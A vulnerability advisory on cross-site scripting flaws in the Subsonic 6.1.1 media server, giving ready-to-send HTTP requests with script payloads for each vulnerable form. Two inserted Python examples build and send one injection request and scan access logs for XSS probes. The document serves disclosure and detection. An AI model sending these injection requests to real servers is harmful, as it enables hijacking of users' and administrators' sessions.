Subsonic 6.1.1 - Multiple Vulnerabilities

by Florian Nivette, on Sep 17, 2018 1:25:59 PM

Product Description

Subsonic is an open source web media server that enables the management of media resources such as music or videos. Its official website is www.subsonic.org. The version affected by the identified vulnerabilities is 6.1.1, released May 31, 2017.

Vulnerabilities List

Two types of cross-site scripting were identified within the Subsonic application:

  • 14 stored cross-site scripting instances
  • Five reflected cross-site scripting instances

These vulnerabilities are described in the following sections.

Affected Version

Version 6.1.1

Subsonic 6.1.1 — Vulnerabilities

Stored Cross-site Scripting

The Subsonic application is affected by 14 stored cross-site scripting (XSS) instances spread across several application features. Each allows an attacker to persist a JavaScript payload in a vulnerable page, where it executes every time a user visits that page. Every instance requires an authenticated account; those reachable by a low-privilege user can be used to target administrators and steal their sessions.

Vulnerability Details

CVE ID: CVE-2018-9282, CVE-2018-14688, CVE-2018-14689, CVE-2018-14690, CVE-2018-14691

Access Vector: Remote

Security Risk: Critical

Vulnerability: CWE-79

CVSS Base Score: 9.8

CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Stored XSS on Podcast Subscription Form (CVE-2018-9282)

The podcast subscription form is affected by one stored cross-site scripting instance. No administrator access is required to exploit it. By injecting a JavaScript payload into the form, an attacker can manipulate user sessions or elevate privileges by targeting an administrative user. The weak parameter is add. The following payload can be used to inject code and verify the vulnerability:

<script>alert(/XSS/)</script>

The request below can be used to exploit the instance; note that the payload in the captured request is prefixed with http:// and an attribute-closing "> sequence:

POST /podcastReceiverAdmin.view? HTTP/1.1
Host: HOST
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2

add=http%3A%2F%2F%22%3E%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E

Stored XSS on Music Tags Settings Form (CVE-2018-14691)

The music tags settings form is affected by three stored XSS instances. No administrator access is required to exploit them, but the tag modification permission is required. By injecting a JavaScript payload into the form, an attacker can manipulate user sessions or elevate privileges by targeting an administrative user. The weak parameters are c0-param2, c0-param3, and c0-param4 of the DWR call to tagService.setTags. The following payload can be used to inject code and verify the vulnerability:

"><script>alert(/XSS/)</script>

The request below could be used to exploit the instances:

POST /dwr/call/plaincall/tagService.setTags.dwr HTTP/1.1
Host: 192.168.1.36:4040
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2

callCount=1
nextReverseAjaxIndex=0
c0-scriptName=tagService
c0-methodName=setTags
c0-id=0
c0-param0=string:65
c0-param1=string:1
c0-param2=string:%22%3E%3Cscript%3Ealert(%2FXSS1%2F)%3C%2Fscript%3E
c0-param3=string:%22%3E%3Cscript%3Ealert(%2FXSS2%2F)%3C%2Fscript%3E
c0-param4=string:%22%3E%3Cscript%3Ealert(%2FXSS3%2F)%3C%2Fscript%3E
c0-param5=string:
c0-param6=string:Bastard%20Pop
batchId=0
instanceId=0
page=%2FeditTags.view%3Fid%3D8
scriptSessionId=SESSIONID2
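The tags instance is the only one on this page that goes through DWR rather than a plain HTML form, and the "> prefix in its payload only matters because the stored value is echoed back into an attribute. The following is an added example, not code from the Bishop Fox advisory or from the Subsonic project: it serialises a DWR plaincall body with the field layout of the captured request, and checks offline whether a page that echoes the stored tag lets the payload escape its attribute into a live script element. The seven-parameter order of setTags (id, track, the three flagged tag fields, year, genre) is inferred from the captured request and is an assumption, as are the host, port and session values.

```python
"""Added example (not from the advisory or the Subsonic code base): build the
DWR plaincall body for tagService.setTags (CVE-2018-14691) and decide offline
whether an echoing page lets '">' break out of an attribute into <script>.
Assumed: setTags parameter order (id, track, field2..4, year, genre) inferred
from the captured request; host, port and session values are placeholders."""
import html
import http.client
from html.parser import HTMLParser
from urllib.parse import quote

# The advisory's marker: '">' closes the attribute the tag is echoed into,
# after which a script element is parsed in element context.
MARKER = '"><script>alert(/XSS/)</script>'


def dwr_body(script_name, method, params, page, script_session_id, batch_id=0):
    """One key=value pair per line; each string argument becomes
    c0-paramN=string:<url-encoded value>, matching the captured request."""
    lines = [
        "callCount=1",
        "nextReverseAjaxIndex=0",
        f"c0-scriptName={script_name}",
        f"c0-methodName={method}",
        "c0-id=0",
    ]
    for i, value in enumerate(params):
        lines.append(f"c0-param{i}=string:{quote(value, safe='')}")
    lines += [
        f"batchId={batch_id}",
        "instanceId=0",
        f"page={quote(page, safe='')}",
        f"scriptSessionId={script_session_id}",
    ]
    return "\n".join(lines)


def settags_body(media_file_id, track, field2, field3, field4, year, genre,
                 page, script_session_id):
    """c0-param2..4 are the parameters the advisory flags; the meaning of the
    other positions is assumed from the captured request."""
    return dwr_body("tagService", "setTags",
                    [media_file_id, track, field2, field3, field4, year, genre],
                    page, script_session_id)


class _ScriptFinder(HTMLParser):
    """Collects the body of every <script> element the tokenizer emits."""
    def __init__(self):
        super().__init__()
        self.in_script, self.scripts = False, []
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
            self.scripts.append("")
    def handle_data(self, data):
        if self.in_script:
            self.scripts[-1] += data
    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False


def injected_scripts(page_html):
    """Return the bodies of <script> elements a browser would execute."""
    finder = _ScriptFinder()
    finder.feed(page_html)
    finder.close()
    return finder.scripts


def render_tag_field(value, escape):
    """Constructed stand-in for a page echoing a stored tag into an input
    attribute: raw (the 6.1.1 behaviour described above) or attribute-escaped."""
    if escape:
        value = html.escape(value, quote=True)
    return f'<input type="text" name="artist" value="{value}">'


def send_dwr(host, port, body, jsessionid, dwrsessionid):
    """POST the body with both session cookies to a host you are authorised
    to test. Not called at import time."""
    conn = http.client.HTTPConnection(host, port, timeout=10)
    conn.request("POST", "/dwr/call/plaincall/tagService.setTags.dwr", body=body,
                 headers={"Content-Type": "text/plain",
                          "Cookie": f"JSESSIONID={jsessionid}; DWRSESSIONID={dwrsessionid}"})
    resp = conn.getresponse()
    return resp.status, resp.read().decode("utf-8", "replace")


if __name__ == "__main__":
    print(settags_body("65", "1", MARKER, MARKER, MARKER, "", "Pop",
                       "/editTags.view?id=8", "SESSIONID2"))
    print(injected_scripts(render_tag_field(MARKER, escape=False)))  # ['alert(/XSS/)']
    print(injected_scripts(render_tag_field(MARKER, escape=True)))   # []
```

The parser-based check is deliberately stricter than grepping for the marker: a page that reflects the string inside a properly quoted and escaped attribute yields no script element, while the raw echo produces one with the body alert(/XSS/), which is exactly the difference between 6.1.1 and a correct fix.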

Stored XSS on Internet Radio Settings Form (CVE-2018-14688)

The internet radio settings form is affected by three stored XSS instances. Administrator access is required to exploit them. By injecting a JavaScript payload into the form, an attacker can manipulate user sessions. The weak parameters are name[x], streamUrl[x], and homepageUrl[x], where x is an integer index. The following payload can be used to inject code and verify the vulnerability:

<script>alert(/XSS/)</script>

The request below could be used to exploit the instances:

POST /internetRadioSettings.view HTTP/1.1
Host: HOST
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2

name%5B1%5D=%22%3Etest%22%3Cscript%3Ealert%28%2Fradioname%2F%29%3C%2Fscript%3E&streamUrl%5B1%5D=%22%3Etest%22%3Cscript%3Ealert%28%2Fradiostreamurl%2F%29%3C%2Fscript%3E&homepageUrl%5B1%5D=%22%3E%22%3Cscript%3Ealert%28%2Fradiohomepage%2F%29%3C%2Fscript%3E&enabled%5B1%5D=on&name=&streamUrl=&homepageUrl=&enabled=on

Stored XSS on General Settings Form (CVE-2018-14690)

The general settings form is affected by two stored XSS instances. Administrator access is required to exploit them. By injecting a JavaScript payload, an attacker can manipulate user sessions. The weak parameters are welcomeTitle and welcomeSubtitle. The following payload can be used to inject code and verify the instances:

<script>alert(/XSS/)</script>

The request below could be used to exploit the instances:

POST /generalSettings.view HTTP/1.1
Host: HOST
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2

musicFileTypes=mp3+ogg+oga+aac+m4a+flac+wav+wma+aif+aiff+ape+mpc+shn&videoFileTypes=flv+avi+mpg+mpeg+mp4+m4v+mkv+mov+wmv+ogv+divx+m2ts&coverArtFileTypes=cover.jpg+cover.png+cover.gif+folder.jpg+jpg+jpeg+gif+png&playlistFolder=%2Fvar%2Fplaylists&index=A+B+C+D+E+F+G+H+I+J+K+L+M+N+O+P+Q+R+S+T+U+V+W+X-Z%28XYZ%29&ignoredArticles=The+El+La+Los+Las+Le+Les&shortcuts=New+Incoming+Podcast&localeIndex=0&themeIndex=0&sortAlbumsByYear=true&_sortAlbumsByYear=on&_gettingStartedEnabled=on&welcomeTitle=Welcome+to+Subsonic%21%22%3E%3Cscript%3Ealert%28%2Fwelcometitle%2F%29%3C%2Fscript%3E&welcomeSubtitle=%22%3E%3Cscript%3Ealert%28%2Fwelcomesubtitle%2F%29%3C%2Fscript%3E&welcomeMessage=Welcome+to+Subsonic%21%0D%0A%5C%5C+%5C%5C%0D%0ASubsonic+is+a+free%2C+web-based+media+streamer%2C+providing+ubiquitous+access+to+your+music.+%0D%0A%5C%5C+%5C%5C%0D%0AUse+it+to+share+your+music+with+friends%2C+or+to+listen+to+your+own+music+while+at+work.+You+can+stream+to+multiple+players+simultaneously%2C+for+instance+to+one+player+in+your+kitchen+and+another+in+your+living+room.%0D%0A%5C%5C+%5C%5C%0D%0ATo+change+or+remove+this+message%2C+log+in+with+administrator+rights+and+go+to+%7Blink%3ASettings+%3E+General%7CgeneralSettings.view%7D.%0D%0A&loginMessage=

Stored XSS on Transcoding Settings Form (CVE-2018-14689)

The transcoding settings form is affected by five stored XSS instances. Administrator access is required to exploit them. By injecting a JavaScript payload, an attacker can manipulate user sessions. The weak parameters are name[x], sourceFormats[x], targetFormat[x], step1[x], and step2[x], where x is an integer index. The following payload can be used to inject code and verify the instances:

<script>alert(/XSS/)</script>

The request below could be used to exploit the instances:

POST /transcodingSettings.view HTTP/1.1
Host: HOST
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2

name%5B0%5D=mp3+audio&sourceFormats%5B0%5D=ogg+oga+aac+m4a+flac+wav+wma+aif+aiff+ape+mpc+shn&targetFormat%5B0%5D=mp3&step1%5B0%5D=ffmpeg+-i+%25s+-map+0%3A0+-b%3Aa+%25bk+-v+0+-f+mp3+-&step2%5B0%5D=&name%5B1%5D=%22%3E%3Cscript%3Ealert%28%2Fname%2F%29%3C%2Fscript%3E&sourceFormats%5B1%5D=%22%3E%3Cscript%3Ealert%28%2Fconvertfrom%2F%29%3C%2Fscript%3E&targetFormat%5B1%5D=%22%3E%3Cscript%3Ealert%28%2Fconvertto%2F%29%3C%2Fscript%3E&step1%5B1%5D=%22%3E%3Cscript%3Ealert%28%2Fstep1%2F%29%3C%2Fscript%3E&step2%5B1%5D=%22%3E%3Cscript%3Ealert%28%2Fstep2%2F%29%3C%2Fscript%3E&name=&sourceFormats=&targetFormat=&step1=&step2=&defaultActive=on&downsampleCommand=ffmpeg+-i+%25s+-map+0%3A0+-b%3Aa+%25bk+-v+0+-f+mp3+-

Reflected Cross-site Scripting

The Subsonic application is affected by five reflected cross-site scripting (XSS) instances. Unlike the stored instances, these require user interaction: the victim must open an attacker-supplied URL or submit an attacker-supplied form for the payload to execute.

Vulnerability Details

CVE ID: CVE-2018-14687, CVE-2018-14692, CVE-2018-14694

Access Vector: Remote

Security Risk: High

Vulnerability: CWE-79

CVSS Base Score: 8.8

CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Reflected XSS Player Settings Form (CVE-2018-14687)

The personal player settings form is affected by three reflected cross-site scripting instances. By injecting a JavaScript payload into the vulnerable parameters, an attacker can use this page to manipulate the user session. The weak parameters are clone and id (GET) and technologyName (POST). The following payload can be used to inject code and verify the flaw:

<script>alert(/XSS/)</script>

The requests below could be used to exploit the instances:

http://HOST/playerSettings.view?clone=%3cscript%3ealert(/XSS/)%3c%2fscript%3e

http://HOST/playerSettings.view?id=%3cscript%3ealert(/XSS/)%3c%2fscript%3e

POST /playerSettings.view HTTP/1.1
Host: HOST
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2

playerId=3&technologyName=JUKEBOX%3cscript%3ealert(/XSS/)%3c%2fscript%3e&name=test&transcodeSchemeName=OFF&dynamicIp=true&_dynamicIp=on&autoControlEnabled=true&_autoControlEnabled=on&activeTranscodingIds=0&_activeTranscodingIds=on

Reflected XSS Stream Page (CVE-2018-14692)

The stream page is affected by one reflected cross-site scripting instance. By injecting a JavaScript payload into the vulnerable parameter, an attacker can use this page to manipulate user sessions. The weak parameter is player. The following payload can be used to inject code and verify the instance:

<script>alert(/XSS/)</script>

The request below could be used to exploit the instance:

http://HOST/stream?player=%3Cscript%3Ealert(/XSS/)%3C/script%3E&id=79&auth=1289324648&suffix=.mp3

Reflected XSS Network Settings Form (CVE-2018-14694)

The network settings form is affected by one reflected cross-site scripting instance. By injecting a JavaScript payload into the vulnerable parameter, an attacker can use this form to manipulate user sessions. The weak parameter is urlRedirectType. The following payload can be used to inject code and verify the instance:

<script>alert(/XSS/)</script>

The request below can be used to exploit the instance:

POST /networkSettings.view HTTP/1.1
Host: HOST
Cookie: JSESSIONID=SESSIONID; DWRSESSIONID=SESSIONID2

_portForwardingEnabled=on&urlRedirectionEnabled=true&_urlRedirectionEnabled=on&urlRedirectType=CUSTOM%3Cscript%3Ealert%28%2FXSS%2F%29%3C%2Fscript%3E&urlRedirectCustomUrl=http%3A%2F%2Ftest
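Because the reflected instances fire only when a victim follows a crafted request, the attacker's probes and the victims' clicks both leave a trace in the web server's access log. The following is an added example, not part of the advisory: it scans combined-format access-log lines (the format Jetty, Tomcat or a reverse proxy in front of Subsonic would typically write, assumed here) for script-like values in the specific endpoint/parameter pairs reported above, decoding repeated percent-encoding so that a double-encoded probe is not missed. The log lines are constructed for this example.

```python
"""Added example (not part of the advisory): flag reflected-XSS probes against
the Subsonic endpoints named above in combined-format access logs.
Assumed: combined log format; the sample lines below are constructed."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Endpoint -> parameters the advisory reports as reflected unescaped.
REFLECTED = {
    "/playerSettings.view": {"clone", "id", "technologyName"},
    "/stream": {"player"},
    "/networkSettings.view": {"urlRedirectType"},
}

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Script-injection hints matched after decoding; deliberately narrow.
SCRIPT_HINT = re.compile(r"<\s*/?\s*script|javascript\s*:|\bon[a-z]+\s*=", re.I)


def decode_until_stable(value, max_rounds=4):
    """Strip repeated percent-encoding so a double-encoded probe
    (%253Cscript%253E) still decodes to '<script>'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def probes_in_line(line):
    """One finding per flagged parameter whose decoded value looks like script."""
    m = LOG_LINE.match(line)
    if not m:
        return []
    target = urlsplit(m.group("target"))
    flagged = REFLECTED.get(target.path)
    if not flagged:
        return []
    hits = []
    for name, raw in parse_qsl(target.query, keep_blank_values=True):
        value = decode_until_stable(raw)
        if name in flagged and SCRIPT_HINT.search(value):
            hits.append({"ip": m.group("ip"), "time": m.group("ts"),
                         "path": target.path, "param": name, "value": value,
                         "status": int(m.group("status"))})
    return hits


def scan(lines):
    """Run probes_in_line over an iterable of log lines."""
    return [hit for line in lines for hit in probes_in_line(line)]


# Constructed sample: a plain probe, a double-encoded probe, a legitimate
# stream request, and a probe against a path the advisory does not cover.
SAMPLE_LOG = """\
203.0.113.7 - - [14/Sep/2018:10:01:02 +0000] "GET /playerSettings.view?clone=%3cscript%3ealert(/XSS/)%3c%2fscript%3e HTTP/1.1" 200 5123
203.0.113.7 - - [14/Sep/2018:10:01:09 +0000] "GET /stream?player=%253Cscript%253Ealert(1)%253C%252Fscript%253E&id=79&suffix=.mp3 HTTP/1.1" 200 88
198.51.100.4 - - [14/Sep/2018:10:02:30 +0000] "GET /stream?player=3&id=79&auth=1289324648&suffix=.mp3 HTTP/1.1" 200 4194304
198.51.100.4 - - [14/Sep/2018:10:03:00 +0000] "GET /home.view?q=%3Cscript%3E HTTP/1.1" 200 2048
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(f'{hit["time"]} {hit["ip"]} {hit["path"]} {hit["param"]}={hit["value"]!r}')
```

One limitation worth keeping in mind: an access log records only the request line, so this catches the GET-based instances (clone, id, player). The technologyName and urlRedirectType instances carry the payload in a POST body, which standard access logs do not capture; detecting those needs a proxy or WAF that logs request bodies, or a check on the application side.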

Disclosure Timeline: 

  • 10/5/2017: Initial discovery
  • 4/3/2018: CVEs requested 
  • 9/14/2018: Public disclosure of vulnerabilities 

Researcher:

Florian Nivette, Security Associate at Bishop Fox 
